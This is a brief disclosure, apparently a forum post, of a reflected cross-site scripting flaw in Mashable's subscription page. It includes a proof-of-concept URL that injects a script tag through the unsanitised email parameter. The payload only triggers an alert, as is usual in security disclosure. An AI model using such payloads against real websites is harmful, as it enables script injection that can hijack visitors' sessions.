The Mashable subscription script fails to sanitise the email field and prints the invalid email on an error page.
Code:
|
1 2 3 |
http://mashable.com/follow/subscriptions/ ?email="><script>alert(1)</script> &fingerprint=be0c8a1f226d1d986340c66ca8d701fffbd1f644 |
